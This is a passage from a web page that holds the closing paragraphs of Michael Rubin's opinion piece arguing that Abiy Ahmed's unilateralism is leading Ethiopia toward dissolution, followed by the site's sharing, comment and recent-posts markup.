<p>Nor has Abiy done himself any favors with fellow African leaders. There is a way presidents and prime ministers speak to the public, and there is a way in which they talk among themselves. Abiy fails at the latter. He lacks candor and appears untethered from the reality that he has created. Many of his counterparts describe him as a naïf with a messiah complex. While African leaders will not publicly abandon one of their own, the shedding of African Union offices from Ethiopia to other capitals reflects Abiy’s declining diplomatic capital. Simply put, beyond Eritrean dictator Isaias Afwerki, who sees himself as Abiy’s superior, and Mohamed Farmaajo, Somalia’s president whose term expired three months ago, Abiy has no friends.</p>
<p>Regional states fear Ethiopia’s dissolution—it would be a nightmare scenario of dislocation and instability—but many diplomats, including those traditionally friendly to Ethiopia, quietly question whether it is already too late. Abiy’s supporters may have justified his action in antipathy to federalism but by choosing unilateralism over negotiation, Abiy may have cemented his legacy not as a Nobel Peace Laureate, but rather as the man who ended a country whose history dates back millennia. It is time for the United States, United Nations, and Ethiopia’s neighbors to plan for its end as a unified entity.<br />
&#8211; Michael Rubin</p>
<div class="mh-social-bottom">
<div class="mh-share-buttons clearfix">
	<a class="mh-facebook" href="#" onclick="window.open('https://www.facebook.com/sharer.php?u=https%3A%2F%2Fayyaantuu.org%2Fenglish%2Fabiy-ahmed-has-condemned-ethiopia-to-dissolution%2F&t=Abiy+Ahmed+Has+Condemned+Ethiopia+to+Dissolution', 'facebookShare', 'width=626,height=436'); return false;" title="Share on Facebook">
		<span class="mh-share-button"><i class="fa fa-facebook"></i></span>
	</a>
	<a class="mh-twitter" href="#" onclick="window.open('https://twitter.com/share?text=Abiy+Ahmed+Has+Condemned+Ethiopia+to+Dissolution:&url=https%3A%2F%2Fayyaantuu.org%2Fenglish%2Fabiy-ahmed-has-condemned-ethiopia-to-dissolution%2F', 'twitterShare', 'width=626,height=436'); return false;" title="Tweet This Post">
		<span class="mh-share-button"><i class="fa fa-twitter"></i></span>
	</a>
	<a class="mh-linkedin" href="#" onclick="window.open('https://www.linkedin.com/shareArticle?mini=true&url=https%3A%2F%2Fayyaantuu.org%2Fenglish%2Fabiy-ahmed-has-condemned-ethiopia-to-dissolution%2F&source=', 'linkedinShare', 'width=626,height=436'); return false;" title="Share on LinkedIn">
		<span class="mh-share-button"><i class="fa fa-linkedin"></i></span>
	</a>
	<a class="mh-pinterest" href="#" onclick="window.open('https://pinterest.com/pin/create/button/?url=https%3A%2F%2Fayyaantuu.org%2Fenglish%2Fabiy-ahmed-has-condemned-ethiopia-to-dissolution%2F&media=https://ayyaantuu.org/wp-content/uploads/2021/05/abiy-ahmed-e1621195962104.jpg&description=Abiy+Ahmed+Has+Condemned+Ethiopia+to+Dissolution', 'pinterestShare', 'width=750,height=350'); return false;" title="Pin This Post">
		<span class="mh-share-button"><i class="fa fa-pinterest"></i></span>
	</a>
	<a class="mh-email" href="mailto:?subject=Abiy%20Ahmed%20Has%20Condemned%20Ethiopia%20to%20Dissolution&amp;body=https%3A%2F%2Fayyaantuu.org%2Fenglish%2Fabiy-ahmed-has-condemned-ethiopia-to-dissolution%2F" title="Send this article to a friend" target="_blank">
		<span class="mh-share-button"><i class="fa fa-envelope-o"></i></span>
	</a>
	<a class="mh-print" href="javascript:window.print()" title="Print this article">
		<span class="mh-share-button"><i class="fa fa-print"></i></span>
	</a>
</div></div>
	</div></article><nav class="mh-post-nav mh-row clearfix" itemscope="itemscope" itemtype="https://schema.org/SiteNavigationElement">
<div class="mh-col-1-2 mh-post-nav-item mh-post-nav-prev">
<a href="https://ayyaantuu.org/afaan-oromoo/lammiilee-chaayinaa-kan-hojii-albuuda-baasuurratti-bobbaan-uummata-oromoo/" rel="prev"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="OROMO LIBERATION ARMY" data-lazy-srcset="https://ayyaantuu.org/wp-content/uploads/2021/05/chinese-1-80x60.jpg 80w, https://ayyaantuu.org/wp-content/uploads/2021/05/chinese-1-326x245.jpg 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://ayyaantuu.org/wp-content/uploads/2021/05/chinese-1-80x60.jpg" /><noscript><img width="80" height="60" src="https://ayyaantuu.org/wp-content/uploads/2021/05/chinese-1-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="OROMO LIBERATION ARMY" srcset="https://ayyaantuu.org/wp-content/uploads/2021/05/chinese-1-80x60.jpg 80w, https://ayyaantuu.org/wp-content/uploads/2021/05/chinese-1-326x245.jpg 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript><span>Previous</span><p>Lammiilee Chaayinaa kan hojii albuuda baasuurratti bobba&#8217;an uummata oromoo</p></a></div>
</nav>
<div id="comments" class="mh-comments-wrap">
			<h4 class="mh-widget-title mh-comment-form-title">
				<span class="mh-widget-title-inner">
					Be the first to comment				</span>
			</h4>	<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title">Leave a Reply <small><a rel="nofollow" id="cancel-comment-reply-link" href="/english/abiy-ahmed-has-condemned-ethiopia-to-dissolution/#respond" style="display:none;">Cancel reply</a></small></h3><form action="https://ayyaantuu.org/wp-comments-post.php" method="post" id="commentform" class="comment-form" novalidate><p class="comment-notes">Your email address will not be published.</p><p class="comment-form-comment"><label for="comment">Comment</label><br/><textarea id="comment" name="comment" cols="45" rows="5" aria-required="true"></textarea></p><p class="comment-form-author"><label for="author">Name </label><span class="required">*</span><br/><input id="author" name="author" type="text" value="" size="30" aria-required='true' /></p>
<p class="comment-form-email"><label for="email">Email </label><span class="required">*</span><br/><input id="email" name="email" type="text" value="" size="30" aria-required='true' /></p>
<p class="comment-form-url"><label for="url">Website</label><br/><input id="url" name="url" type="text" value="" size="30" /></p>
<p class="comment-form-cookies-consent"><input id="wp-comment-cookies-consent" name="wp-comment-cookies-consent" type="checkbox" value="yes" /><label for="wp-comment-cookies-consent">Save my name, email, and website in this browser for the next time I comment.</label></p>
<p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Post Comment" /> <input type='hidden' name='comment_post_ID' value='21556' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p><p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="5c4abee4c6" /></p><input type="hidden" id="ak_js" name="ak_js" value="27"/><textarea name="ak_hp_textarea" cols="45" rows="8" maxlength="100" style="display: none !important;"></textarea></form>	</div><!-- #respond -->
	<p class="akismet_comment_form_privacy_notice">This site uses Akismet to reduce spam. <a href="https://akismet.com/privacy/" target="_blank" rel="nofollow noopener">Learn how your comment data is processed</a>.</p></div>
		</div>
			<aside class="mh-widget-col-1 mh-sidebar" itemscope="itemscope" itemtype="https://schema.org/WPSideBar"><div id="mh_magazine_custom_posts-3" class="mh-widget mh_magazine_custom_posts"><h4 class="mh-widget-title"><span class="mh-widget-title-inner">Recent Posts</span></h4>			<ul class="mh-custom-posts-widget clearfix"> 						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-21551 post type-post status-publish format-standard has-post-thumbnail category-afaan-oromoo">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://ayyaantuu.org/afaan-oromoo/lammiilee-chaayinaa-kan-hojii-albuuda-baasuurratti-bobbaan-uummata-oromoo/" title="Lammiilee Chaayinaa kan hojii albuuda baasuurratti bobba&#8217;an uummata oromoo"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="OROMO LIBERATION ARMY" data-lazy-srcset="https://ayyaantuu.org/wp-content/uploads/2021/05/chinese-1-80x60.jpg 80w, https://ayyaantuu.org/wp-content/uploads/2021/05/chinese-1-326x245.jpg 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://ayyaantuu.org/wp-content/uploads/2021/05/chinese-1-80x60.jpg" /><noscript><img width="80" height="60" src="https://ayyaantuu.org/wp-content/uploads/2021/05/chinese-1-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="OROMO LIBERATION ARMY" srcset="https://ayyaantuu.org/wp-content/uploads/2021/05/chinese-1-80x60.jpg 80w, https://ayyaantuu.org/wp-content/uploads/2021/05/chinese-1-326x245.jpg 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://ayyaantuu.org/afaan-oromoo/lammiilee-chaayinaa-kan-hojii-albuuda-baasuurratti-bobbaan-uummata-oromoo/" title="Lammiilee Chaayinaa kan hojii albuuda baasuurratti bobba&#8217;an uummata oromoo">
										Lammiilee Chaayinaa kan hojii albuuda baasuurratti bobba&#8217;an uummata oromoo									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://ayyaantuu.org/2021/05/">May 16, 2021</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-21546 post type-post status-publish format-standard has-post-thumbnail category-afaan-oromoo">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://ayyaantuu.org/afaan-oromoo/tarkaafiin-waraanni-bilisummaa-oromoo-fudhatu-jabaate-itti-fufe/" title="Tarkaafiin Waraanni Bilisummaa Oromoo Fudhatu jabaate itti fufe"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Tarkaafiin Waraanni Bilisummaa Oromoo" data-lazy-srcset="https://ayyaantuu.org/wp-content/uploads/2021/05/wbo2021-80x60.jpg 80w, https://ayyaantuu.org/wp-content/uploads/2021/05/wbo2021-326x245.jpg 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://ayyaantuu.org/wp-content/uploads/2021/05/wbo2021-80x60.jpg" /><noscript><img width="80" height="60" src="https://ayyaantuu.org/wp-content/uploads/2021/05/wbo2021-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Tarkaafiin Waraanni Bilisummaa Oromoo" srcset="https://ayyaantuu.org/wp-content/uploads/2021/05/wbo2021-80x60.jpg 80w, https://ayyaantuu.org/wp-content/uploads/2021/05/wbo2021-326x245.jpg 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://ayyaantuu.org/afaan-oromoo/tarkaafiin-waraanni-bilisummaa-oromoo-fudhatu-jabaate-itti-fufe/" title="Tarkaafiin Waraanni Bilisummaa Oromoo Fudhatu jabaate itti fufe">
										Tarkaafiin Waraanni Bilisummaa Oromoo Fudhatu jabaate itti fufe									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://ayyaantuu.org/2021/05/">May 16, 2021</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-21541 post type-post status-publish format-standard has-post-thumbnail category-english">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://ayyaantuu.org/english/oromo-community-of-edmonton-protests-violence-in-ethiopia/" title="Oromo community of Edmonton protests violence in Ethiopia"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Oromo Community" data-lazy-srcset="https://ayyaantuu.org/wp-content/uploads/2021/05/oromo-community-80x60.jpg 80w, https://ayyaantuu.org/wp-content/uploads/2021/05/oromo-community-326x245.jpg 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://ayyaantuu.org/wp-content/uploads/2021/05/oromo-community-80x60.jpg" /><noscript><img width="80" height="60" src="https://ayyaantuu.org/wp-content/uploads/2021/05/oromo-community-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Oromo Community" srcset="https://ayyaantuu.org/wp-content/uploads/2021/05/oromo-community-80x60.jpg 80w, https://ayyaantuu.org/wp-content/uploads/2021/05/oromo-community-326x245.jpg 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://ayyaantuu.org/english/oromo-community-of-edmonton-protests-violence-in-ethiopia/" title="Oromo community of Edmonton protests violence in Ethiopia">
										Oromo community of Edmonton protests violence in Ethiopia									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://ayyaantuu.org/2021/05/">May 16, 2021</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-21538 post type-post status-publish format-standard has-post-thumbnail category-english">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://ayyaantuu.org/english/ethiopia-postpones-its-sham-elections-indefinitely/" title="Ethiopia postpones its sham elections indefinitely"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Ethiopia postpones elections" data-lazy-srcset="https://ayyaantuu.org/wp-content/uploads/2021/05/Ethiopians_plight-80x60.png 80w, https://ayyaantuu.org/wp-content/uploads/2021/05/Ethiopians_plight-678x509.png 678w, https://ayyaantuu.org/wp-content/uploads/2021/05/Ethiopians_plight-326x245.png 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://ayyaantuu.org/wp-content/uploads/2021/05/Ethiopians_plight-80x60.png" /><noscript><img width="80" height="60" src="https://ayyaantuu.org/wp-content/uploads/2021/05/Ethiopians_plight-80x60.png" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Ethiopia postpones elections" srcset="https://ayyaantuu.org/wp-content/uploads/2021/05/Ethiopians_plight-80x60.png 80w, https://ayyaantuu.org/wp-content/uploads/2021/05/Ethiopians_plight-678x509.png 678w, https://ayyaantuu.org/wp-content/uploads/2021/05/Ethiopians_plight-326x245.png 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://ayyaantuu.org/english/ethiopia-postpones-its-sham-elections-indefinitely/" title="Ethiopia postpones its sham elections indefinitely">
										Ethiopia postpones its sham elections indefinitely									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://ayyaantuu.org/2021/05/">May 15, 2021</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-21535 post type-post status-publish format-standard has-post-thumbnail category-english">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://ayyaantuu.org/english/oromo-liberation-army-says-it-detained-three-chinese-nationals/" title="Oromo Liberation Army says it Detained Three Chinese Nationals"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="OROMO LIBERATION ARMY" data-lazy-srcset="https://ayyaantuu.org/wp-content/uploads/2021/05/chinese-1-80x60.jpg 80w, https://ayyaantuu.org/wp-content/uploads/2021/05/chinese-1-326x245.jpg 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://ayyaantuu.org/wp-content/uploads/2021/05/chinese-1-80x60.jpg" /><noscript><img width="80" height="60" src="https://ayyaantuu.org/wp-content/uploads/2021/05/chinese-1-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="OROMO LIBERATION ARMY" srcset="https://ayyaantuu.org/wp-content/uploads/2021/05/chinese-1-80x60.jpg 80w, https://ayyaantuu.org/wp-content/uploads/2021/05/chinese-1-326x245.jpg 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://ayyaantuu.org/english/oromo-liberation-army-says-it-detained-three-chinese-nationals/" title="Oromo Liberation Army says it Detained Three Chinese Nationals">
										Oromo Liberation Army says it Detained Three Chinese Nationals									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://ayyaantuu.org/2021/05/">May 15, 2021</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-21532 post type-post status-publish format-standard has-post-thumbnail category-english">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://ayyaantuu.org/english/us-condemns-atrocities-in-tigray/" title="US condemns &#8216;atrocities&#8217; in Tigray"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Tigray" data-lazy-srcset="https://ayyaantuu.org/wp-content/uploads/2021/05/tigray-hungry-80x60.jpg 80w, https://ayyaantuu.org/wp-content/uploads/2021/05/tigray-hungry-326x245.jpg 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://ayyaantuu.org/wp-content/uploads/2021/05/tigray-hungry-80x60.jpg" /><noscript><img width="80" height="60" src="https://ayyaantuu.org/wp-content/uploads/2021/05/tigray-hungry-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Tigray" srcset="https://ayyaantuu.org/wp-content/uploads/2021/05/tigray-hungry-80x60.jpg 80w, https://ayyaantuu.org/wp-content/uploads/2021/05/tigray-hungry-326x245.jpg 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://ayyaantuu.org/english/us-condemns-atrocities-in-tigray/" title="US condemns &#8216;atrocities&#8217; in Tigray">
										US condemns &#8216;atrocities&#8217; in Tigray									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://ayyaantuu.org/2021/05/">May 15, 2021</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-21526 post type-post status-publish format-standard has-post-thumbnail category-english">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://ayyaantuu.org/english/why-ethiopias-elections-fall-short-of-international-standards/" title="Why Ethiopia&#8217;s Elections Fall Short of International Standards?"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Ethiopia&#039;s Elections" data-lazy-srcset="https://ayyaantuu.org/wp-content/uploads/2021/05/sham-election-80x60.jpg 80w, https://ayyaantuu.org/wp-content/uploads/2021/05/sham-election-326x245.jpg 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://ayyaantuu.org/wp-content/uploads/2021/05/sham-election-80x60.jpg" /><noscript><img width="80" height="60" src="https://ayyaantuu.org/wp-content/uploads/2021/05/sham-election-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Ethiopia&#039;s Elections" srcset="https://ayyaantuu.org/wp-content/uploads/2021/05/sham-election-80x60.jpg 80w, https://ayyaantuu.org/wp-content/uploads/2021/05/sham-election-326x245.jpg 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://ayyaantuu.org/english/why-ethiopias-elections-fall-short-of-international-standards/" title="Why Ethiopia&#8217;s Elections Fall Short of International Standards?">
										Why Ethiopia&#8217;s Elections Fall Short of International Standards?									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://ayyaantuu.org/2021/05/">May 15, 2021</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-21521 post type-post status-publish format-standard has-post-thumbnail category-afaan-oromoo">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://ayyaantuu.org/afaan-oromoo/kfo-ajjeechaan-seeraan-alaa-qaama-mootummaatiin-fudhatamaa-jiru-hatattamaan-dhaabbachu-qaba/" title="KFO: Ajjeechaan Seeraan Alaa Qaama Mootummaatiin Fudhatamaa Jiru Hatattamaan Dhaabbachu Qaba"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Kongireesii Federaalawaa Oromoo KFO" data-lazy-srcset="https://ayyaantuu.org/wp-content/uploads/2021/05/kfo-80x60.jpg 80w, https://ayyaantuu.org/wp-content/uploads/2021/05/kfo-326x245.jpg 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://ayyaantuu.org/wp-content/uploads/2021/05/kfo-80x60.jpg" /><noscript><img width="80" height="60" src="https://ayyaantuu.org/wp-content/uploads/2021/05/kfo-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Kongireesii Federaalawaa Oromoo KFO" srcset="https://ayyaantuu.org/wp-content/uploads/2021/05/kfo-80x60.jpg 80w, https://ayyaantuu.org/wp-content/uploads/2021/05/kfo-326x245.jpg 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://ayyaantuu.org/afaan-oromoo/kfo-ajjeechaan-seeraan-alaa-qaama-mootummaatiin-fudhatamaa-jiru-hatattamaan-dhaabbachu-qaba/" title="KFO: Ajjeechaan Seeraan Alaa Qaama Mootummaatiin Fudhatamaa Jiru Hatattamaan Dhaabbachu Qaba">
										KFO: Ajjeechaan Seeraan Alaa Qaama Mootummaatiin Fudhatamaa Jiru Hatattamaan Dhaabbachu Qaba									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://ayyaantuu.org/2021/05/">May 14, 2021</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-21518 post type-post status-publish format-standard has-post-thumbnail category-english">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://ayyaantuu.org/english/travel-by-u-s-special-envoy-for-the-horn-of-africa-jeffrey-feltman/" title="Travel by U.S. Special Envoy for the Horn of Africa Jeffrey Feltman"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Feltman" data-lazy-srcset="https://ayyaantuu.org/wp-content/uploads/2021/05/usembassy-80x60.jpg 80w, https://ayyaantuu.org/wp-content/uploads/2021/05/usembassy-326x245.jpg 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://ayyaantuu.org/wp-content/uploads/2021/05/usembassy-80x60.jpg" /><noscript><img width="80" height="60" src="https://ayyaantuu.org/wp-content/uploads/2021/05/usembassy-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Feltman" srcset="https://ayyaantuu.org/wp-content/uploads/2021/05/usembassy-80x60.jpg 80w, https://ayyaantuu.org/wp-content/uploads/2021/05/usembassy-326x245.jpg 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://ayyaantuu.org/english/travel-by-u-s-special-envoy-for-the-horn-of-africa-jeffrey-feltman/" title="Travel by U.S. Special Envoy for the Horn of Africa Jeffrey Feltman">
										Travel by U.S. Special Envoy for the Horn of Africa Jeffrey Feltman									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://ayyaantuu.org/2021/05/">May 14, 2021</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-21515 post type-post status-publish format-standard has-post-thumbnail category-english">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://ayyaantuu.org/english/an-interview-with-oromo-american-human-rights-activist-seenaa-jimjimo-on-genocide-in-ethiopia/" title="An interview with Oromo American human rights activist Seenaa Jimjimo on genocide in Ethiopia"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Seenaa Jimjimo" data-lazy-srcset="https://ayyaantuu.org/wp-content/uploads/2021/05/Seenaa-JimJimo-80x60.jpg 80w, https://ayyaantuu.org/wp-content/uploads/2021/05/Seenaa-JimJimo-300x225.jpg 300w, https://ayyaantuu.org/wp-content/uploads/2021/05/Seenaa-JimJimo-e1620992552117.jpg 700w, https://ayyaantuu.org/wp-content/uploads/2021/05/Seenaa-JimJimo-768x576.jpg 768w, https://ayyaantuu.org/wp-content/uploads/2021/05/Seenaa-JimJimo-678x509.jpg 678w, https://ayyaantuu.org/wp-content/uploads/2021/05/Seenaa-JimJimo-326x245.jpg 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://ayyaantuu.org/wp-content/uploads/2021/05/Seenaa-JimJimo-80x60.jpg" /><noscript><img width="80" height="60" src="https://ayyaantuu.org/wp-content/uploads/2021/05/Seenaa-JimJimo-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Seenaa Jimjimo" srcset="https://ayyaantuu.org/wp-content/uploads/2021/05/Seenaa-JimJimo-80x60.jpg 80w, https://ayyaantuu.org/wp-content/uploads/2021/05/Seenaa-JimJimo-300x225.jpg 300w, https://ayyaantuu.org/wp-content/uploads/2021/05/Seenaa-JimJimo-e1620992552117.jpg 700w, https://ayyaantuu.org/wp-content/uploads/2021/05/Seenaa-JimJimo-768x576.jpg 768w, https://ayyaantuu.org/wp-content/uploads/2021/05/Seenaa-JimJimo-678x509.jpg 678w, https://ayyaantuu.org/wp-content/uploads/2021/05/Seenaa-JimJimo-326x245.jpg 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://ayyaantuu.org/english/an-interview-with-oromo-american-human-rights-activist-seenaa-jimjimo-on-genocide-in-ethiopia/" title="An interview with Oromo American human rights activist Seenaa Jimjimo on genocide in Ethiopia">
										An interview with Oromo American human rights activist Seenaa Jimjimo on genocide in Ethiopia									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://ayyaantuu.org/2021/05/">May 14, 2021</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-21511 post type-post status-publish format-standard has-post-thumbnail category-english">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://ayyaantuu.org/english/fear-of-civil-war-in-ethiopia/" title="Fear of Civil War in Ethiopia"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Fear of Civil War in Ethiopia" data-lazy-src="https://ayyaantuu.org/wp-content/uploads/2021/05/uoec-80x60.jpg" /><noscript><img width="80" height="60" src="https://ayyaantuu.org/wp-content/uploads/2021/05/uoec-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Fear of Civil War in Ethiopia" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://ayyaantuu.org/english/fear-of-civil-war-in-ethiopia/" title="Fear of Civil War in Ethiopia">
										Fear of Civil War in Ethiopia									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://ayyaantuu.org/2021/05/">May 14, 2021</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-21506 post type-post status-publish format-standard has-post-thumbnail category-english">
															<figure class="mh-custom-posts-thumb">
